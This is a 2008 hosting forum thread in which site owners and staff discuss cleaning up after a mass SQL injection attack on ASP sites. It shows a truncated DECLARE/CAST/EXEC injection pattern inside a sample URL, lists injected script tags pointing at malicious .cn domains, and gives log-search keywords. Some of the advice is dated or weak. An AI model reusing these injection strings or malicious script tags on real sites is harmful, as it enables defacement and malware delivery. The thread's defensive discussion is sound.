Recovering from SQL inject hack

Discussion in 'Database Support' started by Sailor, May 19, 2008.

  1. Sailor

    Sailor Perch

    Wondering if anyone can help me with removing some junk inserted into my tables by a SQL injection hack. They somehow managed to append the text '<script src=http://www.banner82.com/b.js></script>' to several of my text fields. Where the fields were previously empty it's easy to remove, but what SQL command can I use to remove it from the end of fields without losing the rest of the field contents?

    Thanks
  2. Stephen

    Stephen US Operations Staff Member

    Request a restore is the best way, as it most likely overwrote real data.

    Also check your HTTP logs for "NVARCHAR" it will tell you the pages vulnerable and unless you fix it, it WILL KEEP happening over and over.
  3. Sailor

    Sailor Perch

    Already requested info on the restore option. I first need to know how far back the restore point will be.

    Checking logs now. I don't see any instances of "NVARCHAR" - anything else I should be searching for?
  4. Stephen

    Stephen US Operations Staff Member

    no nvarchar is it in all cases I have seen another may be to look for CAST

    however send me a domain and I will find it for you in a matter of seconds :)
  5. Stephen

    Stephen US Operations Staff Member

    It seems to have morphed into a more hard to find Injection now :(
  6. Stephen

    Stephen US Operations Staff Member

    found the new keywork to search for(just basic SQL statements really put into a path) but look for VARCHAR or DECLARE.
  7. Sailor

    Sailor Perch

    Stephen,
    Thanks - you found the page. Since this particular page should only ever have a 4 digit number as the query, my quick fix is to filter that, but I'll also rrwrite the page to do some more complete filtering.

    Thanks
  8. kujo2123

    kujo2123 Perch

    Quick question, are these SQL injection attacks limited to ASP pages? Or are other languages able to be attacked (like ColdFusion)?
  9. Stephen

    Stephen US Operations Staff Member

    It seems mostly like ASP/ASP.NET but ANYTHING is possible if it allows direct SQL code in a search box, etc.
  10. zaboss

    zaboss Perch

    Had a similar attack and the support showed me that they actually use the POST command and URL injection, so, the first thing to do was to deny any POST request in pages (I already have a function that checks every user input in pages for SQL injection).
  11. Stephen

    Stephen US Operations Staff Member

    well POST is a very valid request as well, to submit a search you need to POST etc :)
  12. mohmedsh

    mohmedsh Guppy

    I have the same problem too and i am still trying to recover the database for 6 days now.
    the problem is that my asp pages are many and the attacker runs script about 200 times every day aginist my pages. That makes recovering useless as he will attack again.
  13. Stephen

    Stephen US Operations Staff Member

    :(

    Here is what you need to do then.

    1. get logs from us if you do not have them for what pages need fixed
    2. save a copy of DB that is good, or have us to save it ask in ticke tot pull it out of rotation for saving
    3. fix the injection pages
    4. restore the DB AFTER fixing.
  14. mohmedsh

    mohmedsh Guppy

    Thanks Stephen, i have done all that and i have uploaded a cleaned backup database and opened ticket to restore.
    the problem is that i am not able to bring the site to live till i have about 500 pages fixed , which is not an option.
    just for work around , i have created a new database user with permission set to only read the database. I am using that user to get the site online for visitors to view content but no one can update , insert or delete any thing.
    now i am working on fast fix in the db connection page to make sure no injection can pass to the database
  15. shetty

    shetty Guppy

    Denying POST will not completely help. SQL injection can also be done using GET request as well.

    Complete fix is to convert all the query constructions script to stored_procs instead of doing it inside ASP pages. Stored procs needs only execute permissions to run. Deny write access to all tables. This will be costly sometimes, as many of web applications not designed this way.


    My sites also had SQL injections since April 08. I’ve investigated it. Here how it works.


    For example...

    You have a ASP file customer_lookup.asp with following script in it..

    SELECT * FROM customer_table WHERE cust_email=' & RequestQueryString("email") & ''"

    Where you are constructing the SQL script by appending part of the URL query string value EMAIL.

    Page will be typically called as http://www.mydomain.com/customer_lookup.asp?email="[email protected]"

    Now Attacker can call the same page this way...

    "http://www.mydomain.com/[email protected];DECLARE @S VARCHAR(4000);SET @S=CAST(0x4445434C415....) AS VARCHAR(4000));EXEC(@S);"


    Now the actual script inside the Customer_lookup.asp will be

    "SELECT * from customer_table WHERE [email protected];DECLARE @S VARCHAR(4000);SET @S=CAST(0x4445434C415....) AS VARCHAR(4000));EXEC(@S);"

    As you can see semicolon (";") is a separator for SQL commands. So page will execute injected SQL commands.

    If the db user account you use with IIS has full writes on database then script can drop tables/Query tables & delete/modify other database objects.

    Here are some of the injections to my tables… As you can see all are from “.cn” domain (Chinese).
    <script src=http://www.heihei117.cn/k.js>
    <script src=http://www.wowgm1.cn/m.js></script>
    <script src=http://www.killwow1.cn/g.js></script>
    <script src=http://www.caocaowow.cn/ip.js></script>
    <script src=http://www.kisswow.com.cn/m.js></script>
    <script src=http://www.wowyeye.cn/m.js></script>
    <script src=http://www.heihei117.cn.js></script>


    Another way to solve this problem is that JODOHOST can block all TCP requests coming from CHINESE country at the firewall.
  16. mohmedsh

    mohmedsh Guppy

    Thanks shetty for your post.
    1st of all jodohost can not do any thing in our case as the script is running through our code. The idea to block CHINESE IPs is not valid as when i investigated the problem i found that it is a Trojan that is used to attack and this Trojan is attacking from several countries.
    For my Problem i did a small fix till i rewrite my code. The idea is to use the database connection file that is included in all pages.
    1- I have added on error resume next in that include page so the attacker can not get the error showing useful information that he can use
    2- i have created a user in the database that have permission only to read , that user is assigned to the unlogged session. so the script can not take action unless the user logins to my site.
    3- I have created a script in that include file to check all the data posted and if includes any of the known attack variables i do direct to empty page.
    I hope that can help.
  17. Stephen

    Stephen US Operations Staff Member

    yes that is correct there is a trojan on client PCs all over the world, it is not just chinese.

    In my research I have seen mostly China, but many also from the US some from numerous European countries, and some from South Korea.

    We'd have quite a mess if they tried to block all of these countries as we'd effectively block off much of the world. As you said it can happen in a GET and a POST so limiting the verbs is not a good fix, the best fix is sanitizing all the code of such unwanted data.
  18. aolee

    aolee Guppy

    IS this really caused by a trojan? or a munual SQL INJECT? i also had the same problem. how do I shield my system with this kind of attack. please help. thanks!
  19. Stephen

    Stephen US Operations Staff Member

    There are simply too many SQL injection attempts for it to be manually done.
  20. aolee

    aolee Guppy

    what if u have a program that directlys get the whole url address and compares it to db? how can i filter such injection? if it is injected via browser?i cannot do a whitelist and blacklist filtering, nor based it one char lenght because my url are dynamic?

Share This Page

JodoHost - 26,000 hosting end-users in 100 countries
Plesk Web Hosting
VPS Hosting
H-Sphere Web Hosting
Other Services